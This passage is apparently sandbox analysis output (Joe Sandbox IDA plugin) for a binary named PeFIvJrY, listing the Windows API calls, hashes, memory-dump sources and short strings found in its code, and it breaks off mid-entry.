                                • Instruction ID: de2552ac727d3f1c3b05ff3b8700497ab1b224e0509adde79e0374da4edb32aa
                                • Opcode Fuzzy Hash: 5298a67c4c264d6b6029e7f3ed27971ffb9650be0f828ca79a675ebb64653399
                                • Instruction Fuzzy Hash: 8E118EB5A003099FDB10CFA8D844B9AFBF8FF09305F14806AED85E7340E77599448B94
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 003EEEEA
                                • VariantChangeType.OLEAUT32(00000000,?,00000000,00000003), ref: 003EEF12
                                • VariantClear.OLEAUT32(00000000), ref: 003EEF23
                                • _com_issue_error.COMSUPP ref: 003EEF46
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$ChangeClearInitType_com_issue_error
                                • String ID:
                                • API String ID: 570206083-0
                                • Opcode ID: f34d09e6c6a0ef454409d4b4c5f4f8a6a873a5934713d215a07a9948cfe6cf49
                                • Instruction ID: aa8b8cf392f24d6af9c67a88587aa3b44fdd85ae9e3670563a7fd269918be16f
                                • Opcode Fuzzy Hash: f34d09e6c6a0ef454409d4b4c5f4f8a6a873a5934713d215a07a9948cfe6cf49
                                • Instruction Fuzzy Hash: 9411A031A04269DBCF11DFA5DC09BEEB7BCFB08710F11066AE902E3280E778A9008B54
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Window$ErrorLastShowUpdate
                                • String ID:
                                • API String ID: 2769001205-0
                                • Opcode ID: 6c08fd2fbf5f3b3470e5b5febfc64755f520fe5a30a012e2711230dd1605bbc7
                                • Instruction ID: 2e6ee2c08a7431872cb3ea1f59bfd04d1225dc2c99c04f209476f9baff0bd144
                                • Opcode Fuzzy Hash: 6c08fd2fbf5f3b3470e5b5febfc64755f520fe5a30a012e2711230dd1605bbc7
                                • Instruction Fuzzy Hash: 1A01D272645248DBE3726BA4BC0AB27B751A712716F940675EB08900E0FAF34DA1866E
                                APIs
                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00436BE5,?,00000001,?,?,?,004323C8,?,?,00000000), ref: 00437DDD
                                • GetLastError.KERNEL32(?,00436BE5,?,00000001,?,?,?,004323C8,?,?,00000000,?,?,?,0043294F,?), ref: 00437DE9
                                  • Part of subcall function 00437DAF: CloseHandle.KERNEL32(FFFFFFFE,00437DF9,?,00436BE5,?,00000001,?,?,?,004323C8,?,?,00000000,?,?), ref: 00437DBF
                                • ___initconout.LIBCMT ref: 00437DF9
                                  • Part of subcall function 00437D71: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00437DA0,00436BD2,?,?,004323C8,?,?,00000000,?), ref: 00437D84
                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00436BE5,?,00000001,?,?,?,004323C8,?,?,00000000,?), ref: 00437E0E
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                • String ID:
                                • API String ID: 2744216297-0
                                • Opcode ID: 6f41ca575ebbc0f37ce503d9a99fce0f042069498429ea1683ebce02413858af
                                • Instruction ID: d1dcca09ea3b33ea4532fa679fe84f46d104658bda80c35c05a648c4724ff2f6
                                • Opcode Fuzzy Hash: 6f41ca575ebbc0f37ce503d9a99fce0f042069498429ea1683ebce02413858af
                                • Instruction Fuzzy Hash: 00F01C3A100218BBCF721FD1EC05E9A3F26FF497B0F004461FA2885130DA728830DB99
                                APIs
                                • SleepConditionVariableCS.KERNELBASE(?,00425D6E,00000064), ref: 00425DF4
                                • RtlLeaveCriticalSection.NTDLL(00464694), ref: 00425DFE
                                • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00425D6E,00000064,?,00409125,00468BFC,A05DD77D,00000000,?), ref: 00425E0F
                                • RtlEnterCriticalSection.NTDLL(00464694), ref: 00425E16
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                • String ID:
                                • API String ID: 3269011525-0
                                • Opcode ID: 5b6f7feb3a2770b7079edbfda892940791c2e0900bafd09ee450dcdeb4165623
                                • Instruction ID: 5f218fbe044ef3bf4b8548a1b86cf1d4dcd4fe1dda7ebbe2d7b1a83d50466b56
                                • Opcode Fuzzy Hash: 5b6f7feb3a2770b7079edbfda892940791c2e0900bafd09ee450dcdeb4165623
                                • Instruction Fuzzy Hash: 6BE01235641624ABCF122FD0FC09A8D3F29EB47761B114032FA0D56160DBFD19609BDE
                                APIs
                                • FreeLibrary.KERNEL32(?,?,?,?,?,0043C8A0,000000FF), ref: 0040D496
                                • SysFreeString.OLEAUT32(?), ref: 0040D569
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Free$LibraryString
                                • String ID: gfff
                                • API String ID: 428770685-1553575800
                                • Opcode ID: 422b31086294890f3330d076e3673641c30665e1fd36a114a6298cc095db284d
                                • Instruction ID: 999dafdbc9b66ccf45ebd82acad310b2128db207b5ca0630841afb0c4e336f40
                                • Opcode Fuzzy Hash: 422b31086294890f3330d076e3673641c30665e1fd36a114a6298cc095db284d
                                • Instruction Fuzzy Hash: 99819E71B00901ABE718CF68D998B6AB7A5FF45314F14422EE41AC7BD1D738F964CB88
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: CORE$_TLD
                                • API String ID: 0-4220718512
                                • Opcode ID: 0db884ca6b767263217bdd117db14df29cb09713b69f50b7232d1e41b5a51789
                                • Instruction ID: 9b9e7369b871a37c63767e853005eebfbd6c44e38d9adecfb02f1afc81278296
                                • Opcode Fuzzy Hash: 0db884ca6b767263217bdd117db14df29cb09713b69f50b7232d1e41b5a51789
                                • Instruction Fuzzy Hash: DA6110B0A007049FE710CF68C944BABBBF4FB45314F10466EE415AB3D1D7B9A944CB95
                                APIs
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 00404A46
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 00404B4F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_destroy
                                • String ID: @ >
                                • API String ID: 4194217158-3678301659
                                • Opcode ID: e26f91ea8d368bfb96eff37cd3a7f8bd5bb49fd3e7dd72df476a40dc411d105e
                                • Instruction ID: e09caddf4b03624cba7e680407ad7fc033cd1e27faf50173aa0e026cd2705051
                                • Opcode Fuzzy Hash: e26f91ea8d368bfb96eff37cd3a7f8bd5bb49fd3e7dd72df476a40dc411d105e
                                • Instruction Fuzzy Hash: B751D6B12106108FE7289B28DD8871BB7E1EF85314F544A2EE25AC7ED1D77CF9808B19
                                APIs
                                • GetModuleHandleW.KERNEL32(wmiutils.dll,A05DD77D), ref: 003FC248
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID: unknown$wmiutils.dll
                                • API String ID: 4139908857-194848584
                                • Opcode ID: 9fd84001eb959a555a4a01d1a70883d0bfe1cf1d6e0d25a3f2888604db6d02f6
                                • Instruction ID: 3e90d5a92592e9965b14222fba657234996eec1bc4fece0c7542d38596122e42
                                • Opcode Fuzzy Hash: 9fd84001eb959a555a4a01d1a70883d0bfe1cf1d6e0d25a3f2888604db6d02f6
                                • Instruction Fuzzy Hash: 0B512670A5020C9BDB15CF69DD41BBEBBB4FB49710F10422EE911AB382DB75A904CB91
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Unicode
                                • String ID: `F
                                • API String ID: 470584828-510860190
                                • Opcode ID: e2d81c3b824c5f4f11962fb559425883ee5ba1f91ef5b899ec28e374eb6796d8
                                • Instruction ID: 93048e7c8c6e9720ea2b7cd057e1257b7fb0b31586fac0a873fd3533b663f3c2
                                • Opcode Fuzzy Hash: e2d81c3b824c5f4f11962fb559425883ee5ba1f91ef5b899ec28e374eb6796d8
                                • Instruction Fuzzy Hash: A3413DB1900209AFDB10DFA9C845BAEFBF8FF48314F14812AD915AB380D774A944CBA5
                                APIs
                                • RtlEncodePointer.NTDLL(00000000), ref: 004282E3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: EncodePointer
                                • String ID: MOC$RCC
                                • API String ID: 2118026453-2084237596
                                • Opcode ID: bb4effc26c59d1e4558318f5f02c71e6ee0beec1415469d16b172e902c4d176e
                                • Instruction ID: bc104558e052ee42d2c17a29909e945637320f454f8c54a17b30395cc0f2571f
                                • Opcode Fuzzy Hash: bb4effc26c59d1e4558318f5f02c71e6ee0beec1415469d16b172e902c4d176e
                                • Instruction Fuzzy Hash: CE419C31A00219EFCF15DF98ED81AEE7BB1FF08304F54805AF904A6211D73A9950CB58
                                APIs
                                • VariantClear.OLEAUT32(?), ref: 003EE56A
                                • SysAllocStringLen.OLEAUT32(external client,0000000F), ref: 003EE57F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AllocClearStringVariant
                                • String ID: external client
                                • API String ID: 1959693985-2850503550
                                • Opcode ID: d75ca75c1246373241b859e1eaf7b662b4a9f1ae635444481540761ab7ec061f
                                • Instruction ID: 8fd8bee01f207a0b6a5971d80cccb1e2c1eb85f3ce3cdb8a3cc02a99ce51961b
                                • Opcode Fuzzy Hash: d75ca75c1246373241b859e1eaf7b662b4a9f1ae635444481540761ab7ec061f
                                • Instruction Fuzzy Hash: F93102799006A9DBCB12DF96DC01BBAB774FB15304F104A2AED19A72D0EB35E910CB94
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 00418539
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Concurrency::cancel_current_task
                                • String ID: gfff$gfff
                                • API String ID: 118556049-3084402119
                                • Opcode ID: db5fa17803c80e63141cca86b57056796041d00cb59d0c8b520df2b5a5235220
                                • Instruction ID: 3addcfd2374d3f6cfe2a1d3a9e7e647a9a4a307aca78603f7460f655d894d07b
                                • Opcode Fuzzy Hash: db5fa17803c80e63141cca86b57056796041d00cb59d0c8b520df2b5a5235220
                                • Instruction Fuzzy Hash: 65310AB26000149BDB18DF1AED819AAB75ADFC5340758826EEC06CF345EA35FD50C7A6
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E9B79
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: framework$invoke_rpc
                                • API String ID: 885266447-3532104870
                                • Opcode ID: 54ce5b09c39ff25d86b8c814f5bf6a9f77caef222ac7a9d433c54767e6cc7f57
                                • Instruction ID: b35bb9dd27fffbe073665504c6fca999603a184b8d77957ff41ca99c440bf014
                                • Opcode Fuzzy Hash: 54ce5b09c39ff25d86b8c814f5bf6a9f77caef222ac7a9d433c54767e6cc7f57
                                • Instruction Fuzzy Hash: 2C116D61E003542AEB21EA76DC06FAB37ACDF40310F1405AAF948971D2EA74AE44C3E5
                                APIs
                                • CreateDispTypeInfo.OLEAUT32(00000000,00000800,00000000), ref: 003F44E4
                                • CreateStdDispatch.OLEAUT32(00000000,00000000,00000000,00000008), ref: 003F4534
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Create$DispDispatchInfoType
                                • String ID: `F?
                                • API String ID: 386578787-2815678348
                                • Opcode ID: 6b0a18d15e46d528f2192db40d8b28448cc5108b0377fd0d4e7b74200097e143
                                • Instruction ID: 5899e48055df7258b6a0cfdeb22ccb99b2be97fbaea085773f851256ecaab283
                                • Opcode Fuzzy Hash: 6b0a18d15e46d528f2192db40d8b28448cc5108b0377fd0d4e7b74200097e143
                                • Instruction Fuzzy Hash: DD21E271500709DFD711EF94C809BABBBF8EF45720F204169EA1A9B380DB74A904CB95
                                APIs
                                • __alloca_probe_16.LIBCMT ref: 0042447C
                                • RaiseException.KERNEL32(?,?,?,?,00000001), ref: 004244A1
                                  • Part of subcall function 00427210: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00460EFC,00000017,0042372F,?,004589A4,?), ref: 00427270
                                  • Part of subcall function 0042E422: IsProcessorFeaturePresent.KERNEL32(00000017,0042FFD0), ref: 0042E43E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                • String ID: csm
                                • API String ID: 1924019822-1018135373
                                • Opcode ID: 569424fd3eafc119c8939de28ac22d5fa2fbdc26f3a87d1d7cfe1b2109301a83
                                • Instruction ID: 7655cc3ead4a655d69129440c74f56814c3540cb4fafef13c2e8c8ba68210561
                                • Opcode Fuzzy Hash: 569424fd3eafc119c8939de28ac22d5fa2fbdc26f3a87d1d7cfe1b2109301a83
                                • Instruction Fuzzy Hash: 4C21AF31E002289BCF24EF95E845BAEB3B8EF80714F95441AE405BB351DA38AD44CB98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___tlregdtor
                                • String ID: CORE$_TLD
                                • API String ID: 258401038-4220718512
                                • Opcode ID: 1a73039a95544f54b109ce19c30de66d8f7dc70288daf5bf6539da84ac2ad0e1
                                • Instruction ID: 67a3faa56420e98cd601a6c8b851815d487cb340b98f67c497657b9b81aeea3d
                                • Opcode Fuzzy Hash: 1a73039a95544f54b109ce19c30de66d8f7dc70288daf5bf6539da84ac2ad0e1
                                • Instruction Fuzzy Hash: AD21ACB1A04B409FE361CF29D841B93B7E8FB09710F04496EE46E87391DBB97804CB96
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E20CE
                                  • Part of subcall function 00427210: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00460EFC,00000017,0042372F,?,004589A4,?), ref: 00427270
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionRaise___std_exception_copy
                                • String ID: @ >$@ >
                                • API String ID: 3109751735-3421840758
                                • Opcode ID: 9bddadf1ca33c41bf55cb5fdfb7ba4db751094876b53830b022360c08cbf6831
                                • Instruction ID: fb0cdd26371112b554e34e81bdbe0fe93535ab397a4784194c65f56cb967adab
                                • Opcode Fuzzy Hash: 9bddadf1ca33c41bf55cb5fdfb7ba4db751094876b53830b022360c08cbf6831
                                • Instruction Fuzzy Hash: 12112931A0022CB7CB14BBB5FC02989776C9E00314BA08937FB14A7182FB78EA55869D
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00425A09
                                • ___raise_securityfailure.LIBCMT ref: 00425AF1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
